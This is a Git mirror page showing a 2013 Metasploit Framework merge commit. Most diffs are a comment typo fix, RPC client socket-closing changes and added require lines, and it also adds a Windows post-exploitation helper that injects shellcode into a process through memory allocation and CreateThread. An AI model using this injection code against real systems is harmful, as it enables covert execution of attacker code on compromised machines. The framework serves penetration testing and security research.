infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
jvazquez-r7 2013-06-29 16:24:45 -05:00
parent 81a2d9d1d5 c07254afb0
commit 6e7945ca5e
4 changed files with 52 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/msf/core/exploit/smb/psexec.rb
View File

@ -9,7 +9,7 @@ module Msf
# #
# This code was stolen straight out of the psexec module. Thanks very # This code was stolen straight out of the psexec module. Thanks very
# much for all who contributed to that module!! Instead of uploading # much for all who contributed to that module!! Instead of uploading
# and runing a binary. # and running a binary.
#### ####
module Exploit::Remote::SMB::Psexec module Exploit::Remote::SMB::Psexec

40
lib/msf/core/post/windows/process.rb Normal file
View File

@ -0,0 +1,40 @@
# -*- coding: binary -*-
module Msf
class Post
module Windows
module Process
#
# Injects shellcode to a process, and executes it.
#
# @param shellcode [String] The shellcode to execute
# @param base_addr [Fixnum] The base address to allocate memory
# @param pid [Fixnum] The process ID to inject to
#
# @return [Boolean] True if successful, otherwise false
#
def execute_shellcode(shellcode, base_addr, pid=nil)
pid ||= session.sys.process.getpid
host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
if host.memory.write(shell_addr, shellcode) < shellcode.length
vprint_error("Failed to write shellcode")
return false
end
vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
if ret['return'] < 1
vprint_error("Unable to CreateThread")
return false
end
true
end
end # Process
end # Windows
end # Post
end # Msf

9
lib/msf/core/rpc/v10/client.rb
View File

@ -12,7 +12,7 @@ module RPC
class Client class Client
attr_accessor :sock, :token, :info attr_accessor :token, :info
def initialize(info={}) def initialize(info={})
@ -67,6 +67,7 @@ class Client
) )
res = @cli.send_recv(req) res = @cli.send_recv(req)
@cli.close
if res and [200, 401, 403, 500].include?(res.code) if res and [200, 401, 403, 500].include?(res.code)
resp = MessagePack.unpack(res.body) resp = MessagePack.unpack(res.body)
@ -82,8 +83,10 @@ class Client
end end
def close def close
self.sock.close rescue nil if @cli and @cli.conn?
self.sock = nil @cli.close
end
@cli = nil
end end
end end

6
modules/post/windows/manage/pptp_tunnel.rb
View File

@ -5,11 +5,15 @@
# http://metasploit.com/framework/ # http://metasploit.com/framework/
## ##
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Common include Msf::Post::Common
include Msf::Post::File include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Registry include Msf::Post::Windows::Registry
def initialize(info={}) def initialize(info={})